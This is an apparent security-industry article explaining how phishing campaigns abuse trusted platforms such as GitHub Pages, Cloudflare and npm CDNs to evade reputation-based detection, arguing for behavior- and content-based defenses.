The detection model that protected organizations for two decades assumed malicious infrastructure would look different from legitimate infrastructure. Attackers have systematically dismantled that assumption.
For years, identifying malicious infrastructure was a pattern-matching exercise that security professionals learned to perform almost instinctively. A newly registered domain, an unfamiliar hosting provider, WHOIS records that didn’t quite add up: these were the tells that built domain reputation scores and marked something as suspicious before deeper analysis even began. The signals worked because attackers had to build their own parallel ecosystem, and each step left marks. The infrastructure bore the fingerprints of its illegitimate origins.
That model assumed malicious infrastructure would always look different from legitimate infrastructure. For two decades, it did.
The phishing campaigns now flooding enterprise inboxes don’t bear any of those marks. The credential harvesting pages are hosted on GitHub Pages, the SSL certificates come from Cloudflare, and the domains have existed for years with clean reputation scores. Every signal that security teams learned to read says the infrastructure is safe, because by every traditional measure, it is. The platforms are legitimate. Only the intent is not.
What is living off trusted sites?
Security researchers have started calling this pattern “Living Off Trusted Sites,” or LOTS, a deliberate echo of the “Living Off the Land” tactics where attackers abuse legitimate system tools to evade endpoint detection. The parallel is instructive: just as PowerShell and WMI became attack vectors precisely because they’re essential to normal operations, GitHub and Cloudflare have become phishing infrastructure precisely because blocking them would break the modern enterprise.
The economics of this shift favor attackers in ways that weren’t possible a decade ago. IBM X-Force’s 2025 Threat Intelligence Index observed that cloud hosting services effectively guarantee attackers a trusted URL, domain, and IP address, giving campaigns an air of legitimacy that persists until the hosting provider detects the abuse and acts. But detection at the platform level is slow, and the platforms themselves face an impossible triage problem: GitHub hosts over 400 million repositories, and Cloudflare sits in front of a significant percentage of the entire web. Finding malicious needles in that haystack, at speed, without disrupting legitimate users, is a challenge none of them have solved.
The result is a structural advantage for attackers that incremental detection improvements cannot address. Organizations can’t blacklist these platforms without breaking their own operations, which means the infrastructure that enables modern software development has quietly become the infrastructure that enables modern fraud.
How attackers abuse trusted platforms
The campaign that Socket.dev documented in late 2024 illustrates how thoroughly attackers have internalized this logic. The phishing pages weren’t hosted on suspicious domains; they were served from cdn.jsdelivr.net, a content delivery network that mirrors the entire npm registry and appears on corporate allow-lists worldwide. Attackers had published 175 packages across nine accounts containing no functional code, packages whose only purpose was to get credential harvesting payloads distributed through infrastructure that security tools trust by default. We examine the npm ecosystem’s particular vulnerabilities in depth separately.
The approach exploits a feature, not a flaw. Services like jsDelivr and unpkg exist to give developers free, fast access to any file in any npm package, and a package published to npm becomes available at predictable CDN URLs within minutes. That same convenience makes phishing pages trivially easy to distribute at global scale, with credentials harvested through domains that appear in enterprise allow-lists.
The pattern repeats across the ecosystem. Unit 42 found that 68% of observed phishing infrastructure now operates behind Cloudflare services. RavenMail identified over 100,000 malicious GitHub repositories hosting Microsoft 365 phishing pages. Dynamic DNS services like DuckDNS allow anyone to generate seemingly legitimate hostnames in minutes with zero investment or traceable registration. The Verizon 2025 Data Breach Investigations Report captured the downstream impact: breaches involving third-party platforms doubled from 15% to 30% in a single year, with the report noting that platforms once viewed as trusted have become points of failure.
Why trusted site phishing is harder to take down
The traditional takedown model assumed that malicious infrastructure existed in a gray zone of marginal hosting providers and bulletproof registrars, places where a well-crafted abuse report could trigger rapid removal because the provider had little incentive to protect the customer. That assumption breaks down completely when the infrastructure is GitHub or Cloudflare.
Requesting removal of a phishing page from GitHub means navigating an abuse reporting process designed to avoid false positives that could disrupt legitimate users. Cloudflare’s position as an infrastructure provider rather than a content host complicates requests to block specific pages. Each platform maintains its own procedures, response times, and evidentiary requirements, none of which were designed for credential theft at scale.
The economics compound the problem. Creating a new GitHub repository takes seconds, publishing an npm package requires only an email address, and standing up a Cloudflare Workers instance costs nothing. When infrastructure gets taken down, replacements deploy faster than abuse reports can be processed. The toll scam campaigns that Cisco Talos documented across eight U.S. states, part of Chinese criminal operations that the Wall Street Journal documented as generating over $1 billion across three years, illustrate what becomes possible when infrastructure is disposable and free. Attackers aren’t beating the takedown process; they’re operating at a tempo it was never designed to match.
Detecting phishing when domain reputation fails
The failure of reputation-based detection has been evident for years, and the solution has been discussed for nearly as long: stop evaluating infrastructure and start evaluating behavior. A page hosted on GitHub that requests Microsoft 365 credentials displays behavioral indicators regardless of its hosting location. A redirect chain that passes through multiple legitimate services before reaching a credential harvesting form reveals intent through its structure. The hosting is a red herring; the behavior is the signal.
Yet the shift remains incompletely implemented across most of the industry. CrowdStrike’s 2025 Global Threat Report found that 79% of cyberattack detections were malware-free, with attackers relying on credential abuse and identity-based intrusions rather than traditional payloads. When attacks operate through legitimate channels, using legitimate infrastructure, to harvest credentials that enable legitimate-looking access, the entire concept of a “malicious indicator” requires redefinition. Content analysis, user interaction patterns, and contextual signals need to become primary rather than supplementary, and the infrastructure question needs to become secondary to the intent question.
The organizations that have made this shift aren’t defending against LOTS attacks with better blocklists. They’re defending with systems that understand what the attacker is trying to accomplish, regardless of where they’re trying to accomplish it from.
The Bottom Line
The mental model that treated domain reputation as a primary defense has been systematically dismantled by attackers who recognized what it was actually measuring. Phishing infrastructure now operates from platforms that security tools trust by default, which means traditional indicators have become effectively useless for a growing majority of campaigns.
Organizations still relying primarily on reputation-based detection are defending against an attack model that sophisticated threat actors abandoned years ago. The infrastructure is legitimate. The intent is not. Detection strategies that can’t distinguish between the two aren’t detection strategies anymore.
Key Takeaways
Living Off Trusted Sites describes phishing campaigns that operate from legitimate platforms like GitHub Pages, Cloudflare Workers, and npm CDNs rather than dedicated malicious infrastructure. The approach exploits the trust that security tools place in established platforms, rendering traditional detection signals structurally ineffective rather than merely outdated.
Traditional detection relies on domain reputation, WHOIS data, IP classification, and certificate age to identify malicious infrastructure. When attackers operate from github.io or workers.dev, all these signals indicate legitimate activity because the underlying infrastructure genuinely is legitimate. Organizations cannot block these platforms without disrupting their own operations.
Unit 42 found that 68% of observed phishing infrastructure operates behind Cloudflare services. RavenMail documented over 100,000 malicious GitHub repositories hosting Microsoft 365 phishing pages. Socket.dev identified 175 npm packages designed specifically to serve phishing content through legitimate CDNs. Verizon’s DBIR found that breaches involving third-party platforms doubled to 30% in a single year.
Each platform has different abuse reporting procedures, evidentiary requirements, and response times, none of which were designed for credential theft at scale. The economics are asymmetric: creating replacement infrastructure takes seconds and costs nothing, while takedown processes take hours or days. Attackers operate at a tempo the takedown process cannot match.
Detection must shift from evaluating infrastructure characteristics to analyzing behavior and content. A page requesting Microsoft 365 credentials displays behavioral indicators regardless of where it’s hosted. Content analysis, interaction patterns, and contextual signals become the primary defense layer when reputation signals have been neutralized.
